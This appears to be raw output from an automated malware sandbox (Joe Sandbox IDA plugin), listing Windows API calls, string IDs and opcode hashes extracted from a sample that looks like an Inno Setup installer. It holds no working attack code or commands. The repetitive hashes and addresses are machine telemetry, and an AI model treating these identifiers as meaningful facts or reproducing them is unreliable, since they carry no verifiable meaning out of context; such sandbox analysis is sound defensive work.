                                                                              • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                              • String ID: SeShutdownPrivilege
                                                                              • API String ID: 107509674-3733053543
                                                                              • Opcode ID: 4672a8203829a771e5d00f2c17f761bc323a5d0378d5eda1ad4e77e08b45408c
                                                                              • Instruction ID: 73069b54807863efa740a64668e3ddc19e7753e901194602af91027a354c2964
                                                                              • Opcode Fuzzy Hash: 4672a8203829a771e5d00f2c17f761bc323a5d0378d5eda1ad4e77e08b45408c
                                                                              • Instruction Fuzzy Hash: FDF0687068430275E610AA758C07F2B21989784B5DF50492EBE45EE1C3D7BCD44C8A6E
                                                                              APIs
                                                                              • GetProcAddress.KERNEL32(10000000,ISCryptGetVersion), ref: 0045C8B1
                                                                              • GetProcAddress.KERNEL32(10000000,ArcFourInit), ref: 0045C8C1
                                                                              • GetProcAddress.KERNEL32(10000000,ArcFourCrypt), ref: 0045C8D1
                                                                              • ISCryptGetVersion._ISCRYPT(10000000,ArcFourCrypt,10000000,ArcFourInit,10000000,ISCryptGetVersion,?,0047DFC7,00000000,0047DFF0), ref: 0045C8F6
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc$CryptVersion
                                                                              • String ID: ArcFourCrypt$ArcFourInit$ISCryptGetVersion
                                                                              • API String ID: 1951258720-508647305
                                                                              • Opcode ID: 7e27a9db68ce5781c7a285243bc6d328b0b1bffa5381604cafab58ca7bab5c59
                                                                              • Instruction ID: b92a23805cb6ee5c0910e5f81ef8443a356b34338ef2df7ef9b51b6282c91381
                                                                              • Opcode Fuzzy Hash: 7e27a9db68ce5781c7a285243bc6d328b0b1bffa5381604cafab58ca7bab5c59
                                                                              • Instruction Fuzzy Hash: 87F049F0901700DEDB14DF76BEC633B7695E7A8316F18803BA619A51A2D738044CCA5C
                                                                              APIs
                                                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,004966A6,?,?,00000000,0049A628,?,00496830,00000000,00496884,?,?,00000000,0049A628), ref: 004965BF
                                                                              • SetFileAttributesA.KERNEL32(00000000,00000010), ref: 00496642
                                                                              • FindNextFileA.KERNEL32(000000FF,?,00000000,0049667E,?,00000000,?,00000000,004966A6,?,?,00000000,0049A628,?,00496830,00000000), ref: 0049665A
                                                                              • FindClose.KERNEL32(000000FF,00496685,0049667E,?,00000000,?,00000000,004966A6,?,?,00000000,0049A628,?,00496830,00000000,00496884), ref: 00496678
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: FileFind$AttributesCloseFirstNext
                                                                              • String ID: isRS-$isRS-???.tmp
                                                                              • API String ID: 134685335-3422211394
                                                                              • Opcode ID: e40fe840e367864820aded220cbe64f4e75f2107195e16c4ed2d0cc84f0cff06
                                                                              • Instruction ID: 7c4f1729e62c340c3776f645c08a9404eac4e90145c78096892548085370b188
                                                                              • Opcode Fuzzy Hash: e40fe840e367864820aded220cbe64f4e75f2107195e16c4ed2d0cc84f0cff06
                                                                              • Instruction Fuzzy Hash: 1A31867190161CAFDF10EF65CC51ACEBBBDDB45314F5144B7A808A32A1EA389F458E58
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(oleacc.dll,?,0044E8DD), ref: 0044C03F
                                                                              • GetProcAddress.KERNEL32(00000000,LresultFromObject), ref: 0044C050
                                                                              • GetProcAddress.KERNEL32(00000000,CreateStdAccessibleObject), ref: 0044C060
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc$LibraryLoad
                                                                              • String ID: CreateStdAccessibleObject$LresultFromObject$oleacc.dll
                                                                              • API String ID: 2238633743-1050967733
                                                                              • Opcode ID: c7875b5020b1a0fc70af70b5d3619db3f858b3da6b6721b5bb5bec507322b540
                                                                              • Instruction ID: 768994a2e6e1f30713717b1c29876c1fd16d3b2562f205e666220538aba0b6e7
                                                                              • Opcode Fuzzy Hash: c7875b5020b1a0fc70af70b5d3619db3f858b3da6b6721b5bb5bec507322b540
                                                                              • Instruction Fuzzy Hash: BBF01CB0242701CAFB609FF5ECC672632B4E364708F18557BA0016A2E2C7BD9494CF5E
                                                                              APIs
                                                                              • PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00456809
                                                                              • PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00456830
                                                                              • SetForegroundWindow.USER32(?), ref: 00456841
                                                                              • NtdllDefWindowProc_A.USER32(00000000,?,?,?,00000000,00456B19,?,00000000,00456B55), ref: 00456B04
                                                                              Strings
                                                                              • Cannot evaluate variable because [Code] isn't running yet, xrefs: 00456984
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: MessagePostWindow$ForegroundNtdllProc_
                                                                              • String ID: Cannot evaluate variable because [Code] isn't running yet
                                                                              • API String ID: 2236967946-3182603685
                                                                              • Opcode ID: ea9aa7693e661e956a57dff5922af77563df319d7d3b4e1966ed1c34fece0d0f
                                                                              • Instruction ID: c3083c827e1ea9587a1b946928c79dead0c15e552dd32db2ac5f2442617c6554
                                                                              • Opcode Fuzzy Hash: ea9aa7693e661e956a57dff5922af77563df319d7d3b4e1966ed1c34fece0d0f
                                                                              • Instruction Fuzzy Hash: 6391ED34304204EFDB15DF55C961F5ABBF9EB89305F6280BAEC04A7392C639AE14CB59
                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,GetDiskFreeSpaceExA,00000000,00455467), ref: 00455358
                                                                              • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0045535E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: AddressHandleModuleProc
                                                                              • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                              • API String ID: 1646373207-3712701948
                                                                              • Opcode ID: 272051455b5cb91d1d868c6395d7d8b05e26e0b6de4e27da94085abeb1e9e08c
                                                                              • Instruction ID: 60eca4a99d751df3d3374a87c4cbf3116f086dd8a9115ea48f17d057e3f27308
                                                                              • Opcode Fuzzy Hash: 272051455b5cb91d1d868c6395d7d8b05e26e0b6de4e27da94085abeb1e9e08c
                                                                              • Instruction Fuzzy Hash: 0741A331A00649AFCF01EFA5D892AEFB7B8EF49305F504566F800F7252D67C5D088B69
                                                                              APIs
                                                                              • IsIconic.USER32(?), ref: 00417D1F
                                                                              • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417D3D
                                                                              • GetWindowPlacement.USER32(?,0000002C), ref: 00417D73
                                                                              • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417D9A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Placement$Iconic
                                                                              • String ID: ,
                                                                              • API String ID: 568898626-3772416878
                                                                              • Opcode ID: 26b47a840ef5862fe313a436c6949d2016bb3e60c65edf9f9fab0a84da756b7f
                                                                              • Instruction ID: 117db6d3727d0f94901dea8748b8d47281c3d2add8a8e77c7f929e434730b1f7
                                                                              • Opcode Fuzzy Hash: 26b47a840ef5862fe313a436c6949d2016bb3e60c65edf9f9fab0a84da756b7f
                                                                              • Instruction Fuzzy Hash: 41213171604208ABCF40EF69E8C0EEA77B8AF49314F05456AFD18DF246C678DD84CB68
APIs
• SetErrorMode.KERNEL32(00000001,00000000,004635C1), ref: 00463435
• FindFirstFileA.KERNEL32(00000000,?,00000000,00463594,?,00000001,00000000,004635C1), ref: 004634C4
• FindNextFileA.KERNEL32(000000FF,?,00000000,00463576,?,00000000,?,00000000,00463594,?,00000001,00000000,004635C1), ref: 00463556
• FindClose.KERNEL32(000000FF,0046357D,00463576,?,00000000,?,00000000,00463594,?,00000001,00000000,004635C1), ref: 00463570
Memory Dump Source
• Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
Similarity
• API ID: Find$File$CloseErrorFirstModeNext
• String ID:
• API String ID: 4011626565-0
• Opcode ID: e49648f109a0a58d0dd59af0c8e0b33ee568661d64b452756319b7b75e20b746
• Instruction ID: c18d1c41accea68cb41f5c12e74b437797437286b731c7b532b71dbbd74da020
• Opcode Fuzzy Hash: e49648f109a0a58d0dd59af0c8e0b33ee568661d64b452756319b7b75e20b746
• Instruction Fuzzy Hash: 7141C870A00658AFCB11EF65CC55ADEB7B8EB88309F4044BAF404A7391E73C9F448E59
APIs
• SetErrorMode.KERNEL32(00000001,00000000,00463A67), ref: 004638F5
• FindFirstFileA.KERNEL32(00000000,?,00000000,00463A32,?,00000001,00000000,00463A67), ref: 0046393B
• FindNextFileA.KERNEL32(000000FF,?,00000000,00463A14,?,00000000,?,00000000,00463A32,?,00000001,00000000,00463A67), ref: 004639F0
• FindClose.KERNEL32(000000FF,00463A1B,00463A14,?,00000000,?,00000000,00463A32,?,00000001,00000000,00463A67), ref: 00463A0E
Memory Dump Source
• Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
Similarity
• API ID: Find$File$CloseErrorFirstModeNext
• String ID:
• API String ID: 4011626565-0
• Opcode ID: 9717836182e89b8284e108105af98bb591f0e4e25fd179eca548328e5960a9af
• Instruction ID: a32f7eebc160b2c926ffd988aba38ac49d653b749f4bb5a92982eb88da04d6a0
• Opcode Fuzzy Hash: 9717836182e89b8284e108105af98bb591f0e4e25fd179eca548328e5960a9af
• Instruction Fuzzy Hash: B6418175A00A58DBCB10EFA5DC859DEB7B8EB88305F4044AAF804E7341EB78DF458E49
APIs
• CreateFileA.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,0045259F,00000000,004525C0), ref: 0042E7CA
• DeviceIoControl.KERNEL32(00000000,0009C040,?,00000002,00000000,00000000,?,00000000), ref: 0042E7F5
• GetLastError.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,0045259F,00000000,004525C0), ref: 0042E802
• CloseHandle.KERNEL32(00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,0045259F,00000000,004525C0), ref: 0042E80A
• SetLastError.KERNEL32(00000000,00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,0045259F,00000000,004525C0), ref: 0042E810
Memory Dump Source
• Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
Similarity
• API ID: ErrorLast$CloseControlCreateDeviceFileHandle
• String ID:
• API String ID: 1177325624-0
• Opcode ID: e445e4d3b540bec23f5d4472a545cd66e54ba2727ac284448d8f04acb6f91a05
• Instruction ID: 97181128065a238999caafd211b152b701c4b4b5d95cf39bc3f304bf3469fa68
• Opcode Fuzzy Hash: e445e4d3b540bec23f5d4472a545cd66e54ba2727ac284448d8f04acb6f91a05
• Instruction Fuzzy Hash: 4FF0F0713917203AF620B17A6C82F7B018CCB85F68F10823ABB04FF1C1D9A84C06066D
APIs
• IsIconic.USER32(?), ref: 00481CEE
• GetWindowLongA.USER32(00000000,000000F0), ref: 00481D0C
• ShowWindow.USER32(00000000,00000005,00000000,000000F0,0049B050,0048140A,0048143E,00000000,0048145E,?,?,00000001,0049B050), ref: 00481D2E
• ShowWindow.USER32(00000000,00000000,00000000,000000F0,0049B050,0048140A,0048143E,00000000,0048145E,?,?,00000001,0049B050), ref: 00481D42
Memory Dump Source
• Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
Similarity
• API ID: Window$Show$IconicLong
• String ID:
• API String ID: 2754861897-0
• Opcode ID: c69467129eacf3a94fb6d098dc0e524b237b2cf8676cbdccd17621b53cbb6cc5
• Instruction ID: bd4bfa8a532e55613b66c26f3878df869b3cba8388d9d733fde35ddb9b3db323
• Opcode Fuzzy Hash: c69467129eacf3a94fb6d098dc0e524b237b2cf8676cbdccd17621b53cbb6cc5
• Instruction Fuzzy Hash: F50171302402455AD700B72A9D45B5F23D8AB17308F08093BBC51DF6B3DBADAC52974C
APIs
• FindFirstFileA.KERNEL32(00000000,?,00000000,00461F4C), ref: 00461ED0
• FindNextFileA.KERNEL32(000000FF,?,00000000,00461F2C,?,00000000,?,00000000,00461F4C), ref: 00461F0C
• FindClose.KERNEL32(000000FF,00461F33,00461F2C,?,00000000,?,00000000,00461F4C), ref: 00461F26
Memory Dump Source
• Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
Similarity
• API ID: Find$File$CloseFirstNext
• String ID:
• API String ID: 3541575487-0
• Opcode ID: 1a673c2b66217e2f20547520184ec98711dcfa8b7e2b2042291a9693f5272520
• Instruction ID: db92842bd19ae7c5582670e9e06bbe606287ea98b9da9161f37068fcc8ef57ce
• Opcode Fuzzy Hash: 1a673c2b66217e2f20547520184ec98711dcfa8b7e2b2042291a9693f5272520
• Instruction Fuzzy Hash: 9C21D831A047086ECB15EB65CC41ADEBBBCDB49304F5484F7B808E31B1E7389E45CA5A
APIs
• IsIconic.USER32(?), ref: 004241F4
• SetActiveWindow.USER32(?,?,?,0046BD86), ref: 00424201
  • Part of subcall function 0042365C: ShowWindow.USER32(00410660,00000009,?,00000000,0041EDB4,0042394A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C), ref: 00423677
  • Part of subcall function 00423B24: SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000013,?,021125AC,0042421A,?,?,?,0046BD86), ref: 00423B5F
• SetFocus.USER32(00000000,?,?,?,0046BD86), ref: 0042422E
Memory Dump Source
• Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
Similarity
• API ID: Window$ActiveFocusIconicShow
• String ID:
• API String ID: 649377781-0
• Opcode ID: ed84ae51c3243303549a7701ee85abab7e493b259ddab68dfc4eb862261256dd
• Instruction ID: b114ffa8fbe078055c417a305beb0b6e8983b6333d82b3c601511fe05fbe2975
• Opcode Fuzzy Hash: ed84ae51c3243303549a7701ee85abab7e493b259ddab68dfc4eb862261256dd
• Instruction Fuzzy Hash: 07F03A717001208BCB10EFAA98C4B9662A8EF48344B5500BBBC09DF34BCA7CDC0187A8
APIs
• IsIconic.USER32(?), ref: 00417D1F
• SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417D3D
• GetWindowPlacement.USER32(?,0000002C), ref: 00417D73
• SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417D9A
Memory Dump Source
• Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
Similarity
• API ID: Window$Placement$Iconic
• String ID:
• API String ID: 568898626-0
• Opcode ID: 78b183ff173bcf850c00c3571251db26553f1d4c2e21dbadcd3fc230454a4dd4
• Instruction ID: b3485382f52430a3de90e88073d2477855dbbaeb9eeee9907b508ce44eeb6dab
• Opcode Fuzzy Hash: 78b183ff173bcf850c00c3571251db26553f1d4c2e21dbadcd3fc230454a4dd4
• Instruction Fuzzy Hash: 02017C31204108ABDB10EE69E8C1EEA73A8AF45324F054567FD08CF242D639ECC087A8
APIs
Memory Dump Source
• Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
Similarity
• API ID: CaptureIconic
• String ID:
• API String ID: 2277910766-0
• Opcode ID: da7d7cf270f73b88fe6686235f1bf383b0466356a3000177edae3a378d650de6
• Instruction ID: 1c917faadd476c588bdf1ff4a00e1594475ac94e71cf422183988d33397b9b13
• Opcode Fuzzy Hash: da7d7cf270f73b88fe6686235f1bf383b0466356a3000177edae3a378d650de6
• Instruction Fuzzy Hash: 85F04F32304A028BDB21A72EC885AEB62F59F84368B14443FE415CB765EB7CDCD58758
APIs
• IsIconic.USER32(?), ref: 004241AB
  • Part of subcall function 00423A94: EnumWindows.USER32(00423A2C), ref: 00423AB8
  • Part of subcall function 00423A94: GetWindow.USER32(?,00000003), ref: 00423ACD
  • Part of subcall function 00423A94: GetWindowLongA.USER32(?,000000EC), ref: 00423ADC
  • Part of subcall function 00423A94: SetWindowPos.USER32(00000000,lAB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,004241BB,?,?,00423D83), ref: 00423B12
• SetActiveWindow.USER32(?,?,?,00423D83,00000000,0042416C), ref: 004241BF
  • Part of subcall function 0042365C: ShowWindow.USER32(00410660,00000009,?,00000000,0041EDB4,0042394A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C), ref: 00423677
Memory Dump Source
• Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
Similarity
• API ID: Window$ActiveEnumIconicLongShowWindows
• String ID:
• API String ID: 2671590913-0
• Opcode ID: 548c1371db5ef4c0c17b9a522ca0bf08e6ca127860c871a9e63ea88f43f493a6
• Instruction ID: ffd443eaca36288e12b0fd3e34cf0737071334a0f5e631569de285e60205db71
• Opcode Fuzzy Hash: 548c1371db5ef4c0c17b9a522ca0bf08e6ca127860c871a9e63ea88f43f493a6
• Instruction Fuzzy Hash: 02E0E5A470010187EF00EFAAD8C9B9662A9AB48304F55057ABC08CF24BDA78C954C724
                                                                              APIs
                                                                              • NtdllDefWindowProc_A.USER32(?,?,?,?,00000000,004127E5), ref: 004127D3
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: NtdllProc_Window
                                                                              • String ID:
                                                                              • API String ID: 4255912815-0
                                                                              • Opcode ID: b965a0132ad26a56d58156bb8aa5a4c51339e286f8ae4d564bc11b0873dfe01e
                                                                              • Instruction ID: b8ba5a3252dd9dd8755954997f8cc70cf1688dd1015ecfd52c1097a8d2c67521
                                                                              • Opcode Fuzzy Hash: b965a0132ad26a56d58156bb8aa5a4c51339e286f8ae4d564bc11b0873dfe01e
                                                                              • Instruction Fuzzy Hash: 995106316082058FC710DB6AD681A9BF3E5FF98304B2482BBD854C7392D7B8EDA1C759
                                                                              APIs
                                                                              • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 004776B6
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: NtdllProc_Window
                                                                              • String ID:
                                                                              • API String ID: 4255912815-0
